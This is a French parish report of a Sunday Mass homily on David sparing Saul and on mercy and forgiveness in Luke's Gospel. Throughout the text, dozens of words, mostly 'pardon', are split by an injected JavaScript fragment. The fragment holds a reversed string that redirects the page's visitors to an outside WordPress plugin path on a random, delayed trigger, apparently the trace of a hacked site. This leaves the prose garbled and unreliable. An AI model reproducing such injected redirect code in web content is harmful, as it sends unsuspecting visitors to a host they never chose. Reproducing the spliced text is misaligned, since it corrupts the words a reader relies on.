La sainte Messe de dix heures de ce septième dimanche du Temps ordinaire de l’année c, ici au Sanctuaire marial de Schoenstatt Mont Sion Gikungu, a été présidée par l’abbé Jean Marie Chadrack NDUWIMINA, originaire de la Paroisse MUNANIRA et actuel Directeur de l’internat au Petit Séminaire de Kanyosha. Dans son introduction, il a évoqué les raisons de notre présence à cette Eucharistie, c’est premièrement pour remercier le Seigneur, notre Dieu, de nous avoir protégé toute la semaine et d’avoir guider nos pas et deuxièmement pour Lui demander partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don pour nos fautes et nos manquements afin qu’Il puisse nous purifier, nous bénir et nous accompagner dans la semaine suivante. Il a ensuite toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné en résumé les saintes Lectures du jour. Le Seigneur nous invite à nous partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner les uns les autres comme Lui aussi le fait sans cesse. Dans la première lecture du livre de Samuel, il est question du partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don que David a accordé au roi Saül qui le persécutait. Dans l’Évangile de Jésus Christ selon saint Luc c’est de la miséricorde divine qui est au centre et nous sommes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc appelés à être miséricordieux comme Lui. Par ici on peut toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc se demander combien de fois nous supportons ceux qui nous ont fait du mal, ceux qui nous ont brisé le cœur et offensé, combien de fois nous faisons du bien autour de nous et partageons le peu que nous avons avec les autres.

Dans son homélie, l’Abbé NDUWIMANA nous a expliqué comment les saintes écritures de ce jour nous incite à surpasser notre nature humaine, à dépasser nos habitudes quotidiennes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la vengeance et la jalousie pour devenir miséricordieux et partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner nos prochains. Il a continué en disant que la Parole de Dieu tirée du livre de Samuel avec l’histoire de Saül, le roi de l’Israël, comment les israélites, après avoir franchi les portes de la terre promise, copiant les autres nations et leurs modes de vie, ont demandé d’être dirigé, d’avoir un roi puis Dieu leur a choisi Saül comme roi en passant par son prophète Samuel qui l’a intronisé.

Le roi Saül a accompli certaines choses qui ont plu à Dieu mais au final son cœur s’est éloigné de Dieu en atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doptant des comportements étranges. Il ne respectait plus la Parole de Dieu, n’écoutait plus ce que le prophète lui disait de faire d’où le Seigneur envoya alors son serviteur introniser David comme roi en remplacement de Saül. David commença alors à être persécuté par le roi qui était au pouvoir parce que les gens lui admiraient du fait qu’il était le seul qui avait pu vaincre Goliath. Ils dansaient pour lui en disant que le roi Saül avait pu vaincre mille ennemies mais que David venait de vaincre beaucoup plus que lui. Ce qui lui a rendu jaloux et en colère, croyant que David allait le détrôner. La jalousie et la colère lui ont fait commettre des atrocités envers un innocent. Ces dernières lui ont empêché de voir combien il venait de sauver son peuple, il ne cherchait qu’à se venger. Tout comme Saül, ça nous arrive aussi la même chose dans notre vie quotidienne, la jalousie et la colère nous font commettre l’irréparable en cherchant à se venger, faire du mal partout et autour de nous, condamner même des innocents et des justes. A notre lieu de travail combien de fois nous avons été jaloux du succès des autres au point de vouloir les tuer, comploter, les induire en erreur, proférer des mensonges ou trahir nos collègues afin de les remplacer à leurs postes de travail en oubliant que nous aussi nous avions remplacé d’autres, que nous sommes de passage sur cette terre et que rien ne serait enterrer avec nous. Nous devrions comprendre alors que nous devrons remplir nos responsabilités avec dignité et honnêteté car à notre mort, nous aurons des comptes à rendre à notre Créateur.

Après tout, cette lecture nous montre que nous avons un Dieu qui se bat pour nous, qui combat à nos côtés, qui se soucie de notre bien-être, qui fait tout pour que nous soyons heureux. Par exemple, le Saül qui avait pris des centaines de soldats pour combattre une seule personne et que Dieu lui a infligé le sommeil, lui et ses soldats. David avait toutes les chances à ses côtés pour tuer son persécuteur, pour se venger à son tour, c’est Dieu qui lui avait livré Saül sur le plateau d’or. Ceci nous montre que les faibles et les opprimés Dieu est toujours là pour eux dans leurs moments de détresse, qu’Il est là dans tout ce que nous traversons. Nos problèmes quotidiens de travail et de famille ne peuvent en aucun cas dépasser le pouvoir de notre Seigneur parce qu’il est très étendu. Le plus important est de croire que nos détresses et nos problèmes n’ont pas le dernier mot sur notre vie, que nous devrions faire confiance à Dieu pour qu’Il nous guide et nous accompagne.

Pour lui, David nous enseigne aujourd’hui à ne pas chercher la vengeance. Il avait Saül entre ses mains, Dieu le lui avait livré sur un plateau d’or mais il a vu les choses autrement, il n’a pas voulu lui faire du mal parce qu’Il était sacre, l’huile sacre avait été verse sur lui, il ne devrait pas lui ôter la vie. Nous devrions nous pose alors la question de savoir si quand nous tuons, jugeons et condamnons les autres, nous avons conscience qu’ils ont été créés à l’image de Dieu, qu’ils sont sacrés.

Nos jugements à l’égard des autres, cette façon de dire des calomnies, de les tuer avec les mots, de détruire leurs images avec de la trahison, cette manière de les traiter avec haine et amertumes ne nous rend pas conscient que nos mots sont des armes a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doubles tranchants, à travers ces mots nous détruisons la vie des autres pour dire que tuer n’est pas seulement verser du sang. En faisant équipe aussi avec des tueurs qui complote pour une personne, étant complice dans des crimes, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner conseils d’approbation à celui qui cherche à tuer, nous devenons criminels comme eux.

Dans l’Évangile de saint Luc, Jésus Christ nous invite à être miséricordieux, à partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner comme Il le fait pour nous chaque jour. Donc nous devrions méditer sur la qualité de notre partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don envers les autres, se demander si nous sommes miséricordieux comme nous devrions l’être, savoir à quel point nous arrivons à partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner ceux qui nous brisent le cœur, qui ont tué nos proches, qui nous ont fait du mal. Il nous enseigne à partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner parce que si nous ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnons pas le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don, nous ne serons pas partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés à notre tour par le Seigneur. Le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don ouvre encore la porte aux grâces et bénédictions, la sérénité nous envahit et la paix du cœur demeure, comme l’a dit saint Paul apôtre dans sa lettre adressée aux Galates disant que nous récolterons ce que nous aurons semé. Si nous semons le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don, nous serons partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés et si nous semons la haine, nous ne verrons pas la vie éternelle.

Ingrid MUNEZERO